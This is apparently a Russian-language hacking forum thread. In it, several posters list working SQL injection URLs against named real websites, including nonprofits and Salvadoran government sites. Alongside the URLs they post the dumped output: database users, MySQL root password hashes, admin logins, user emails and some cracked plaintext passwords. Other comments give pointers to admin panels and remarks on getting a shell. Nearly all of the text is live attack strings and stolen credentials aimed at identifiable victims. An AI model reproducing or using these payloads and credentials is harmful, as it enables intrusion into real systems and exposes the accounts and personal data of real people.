www.rtg.us http://www.rtg.us/ http://www.rtg.us/news.php?mode=detail&id=-3+union+select+1,concat(name,char(58),password),3,4,5,6,7,8+from+admins/* admin : puhhema Админка: http://www.rtg.us/admin
forestenterprise.com HTML: http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE( )),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* USER:fealtd@localhost VERSION:4.1.22 DATABASE:fealtd HTML: http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(user,0x3a,password),2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user/* Таблица - mysql.user Поля - user,password fealtd:674bea6212f90cad
http://www.exploresouthbend.org/news.php?id=-96+union+select+1,2,3,4,5/* таблицу подобрать не получилось((
http://www.ezgulik.org/news.php?id=-274+union+select+1,2,3,4,5,6/*&status=2 таблицу подобрать не получилось((
http://www.acluhawaii.org/news.php?id=-210+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* таблицу подобрать не получилось((
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,2,3+from+wma_users/* Колонки не подобрал((
http://www.chicagomediaaction.org/news.php?id=-419+union+select+1,2,3,4,5,6,7,8/* Таблицу не подобрал
www.pdma.org http://www.pdma.org/ http://www.pdma.org/news.php?ID=213+union+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10+from+mysql.user/* root:0cfc2076799e429f:hippo еще есть таблица user http://www.pdma.org/news.php?ID=213+union+select+1,2,3,4,5,6,7,8,9,10+from+user/* Но колонки подпбрать не смог
www.dadcomehome.org http://www.dadcomehome.org/ http://www.dadcomehome.org/news.php?strid=1217&id=-2408+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14+from+users/ admin:9a997d8da071c76edc7aa3e9a89b251d
www.eurowizja.org http://www.eurowizja.org/ http://www.eurowizja.org/news.php?id=-1149+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+1,48/*
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,3,4,5,6/*&status=2 http://www.grfoundation.org/news.php?id=-110+union+select+1,2,3,4,5,6,7,8,9,10/* http://www.seacoastrugby.org/ http://www.seacoastrugby.org/news.php?id=-141+union+select+1,2,concat(username,char(58),password,char(58),email),4+from+mos_users/* admin:f749b2d0d046218a980aa301950d6aa7:rugbyboy Админку не нашел
Че-то за мной все стали оранджевым писать, плагиат однако, надо было копирайты ставить))) http://www.proactiva.com.sv/ Code: http://www.proactiva.com.sv/lanzamiento_det.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9/* http://www.delcamino.org.sv/ Code: http://www.delcamino.org.sv/newsDetail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14/* http://www.nombredejesus.gob.sv/ Code: http://www.nombredejesus.gob.sv/pages/noticias.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x78),0x78),4,5,6,7+from+mysql.user/* root:0ba072e62d7711e2 http://www.mag.gob.sv/ Министерство Агрокультуры Сальвадора)))) Code: http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10+from+mysql.user/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97 root:2fa7f6d5676bffd5 Таблица админа: Code: http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,usuario,password),5,6,7,8,9,10+from+agroelsalvador.admin_emark+limit+0,1/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97 Колонка password также содержится в Мускул 5, кому надо, тот расковыряет...
http://www.ultraproducts.com/ http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3b,password)+from+users+limit+0,1/*
2Ded MustD!e: ыыы, сделаю красным пожалуй )). Опять .AU, надеюсь никого еще этим не задолбал . http://my.highway1.com.au/ О чем сайт я не понял. По URL'у /admin/ по идее распологаеться админка, к которой доступ 403 Forbidden. Также рекомендую посмотреть крайне информативный robots.txt, что этим хотели сказать я также не понял . Для тех, кто интересуеться, есть file_priv: Вот только magic_quotes=on, так что идея получить шелл через скуль обрубаеться на корню. http://www.ellaways.com.au/ Вообщем сайт тоже очень непонятный по контенту . Зато есть админка и даже с правом доступа в директории /admin/ Вот только аккаунта админа я не знаю, т.к. таблицы я не подобрал .
nahostfocus.de HTML: http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),17/* USER:[email protected] VERSION:5.0.32-Debian_7etch1~bpo.1-log DATABASE:nahostfocus_de 13 HTML: http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_name),17+from+information_schema.tables/* HTML: http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(column_name),17+from+information_schema.columns/*
.AU http://www.unicentral.net.au/ Подобрал таблицу и поля, аккаунт в /admin/ не подходит =\ http://www.spcc.nsw.edu.au/ Таблицы подобрать неполучилось
2 trumps Concat - конкатенция строк. Не нужно писать concat(column_name) FROM что-то, пиши просто column_name FROM что-то 2 all http://gaffa.dk/ HTML: http://gaffa.dk/nyheder/view.php/news_id=-17392+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.11-Debian_4sarge8-log:gaffa@localhost:gaffa http://www.gearjunkies.com/ HTML: http://www.gearjunkies.com/news_info.php?news_id=731+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database())/* 4.0.24-log:gj_web_user@localhost:gearjunkies http://www.moteurnature.com/ HTML: http://www.moteurnature.com/actu/uneactu.php?news_id=-464+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/* 4.0.25-standard-log:[email protected]:moteurnaactua http://youarenotalone.bg/ HTML: http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/* 5.0.30-Debian_3-log:notalone@localhost:notalone HTML: http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,id,username,password,email),3,4,5,6,7,8,9,10,11,12,13+FROM+admin+LIMIT+5,1/* 1:standart:7b204c168a0c76ef3a93c4ee78dc3b7a:::standart 8:notalone:b37876218b4aff603cccd55d41fd7338:::alonenot ... http://www.krepsinis.net/ HTML: http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 5.0.22-log:[email protected]:krepsinis HTML: http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,USER_NAME,PASSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+users+LIMIT+0,1/* Setonas:66666:[email protected] (логин справа =) ... http://www.alteragate.net/ HTML: http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4/* 4.1.15-log:forum_admin@localhost:forum_db HTML: http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,user_password,user_email),0x71),0x71),4+FROM+phpbb_users+WHERE+user_id=5/* (http://forum.alteragate.net/) Silver Elf:315eb115d98fcbad39ffc5edebd669c9:[email protected]::qweasdzxc Lord Sirax:b0a2507b88288f07c66cc3398f380052:[email protected]::salamander Angela_angel:6c30734811916b0f0f24a4630b08036f:[email protected]::1234321 ...
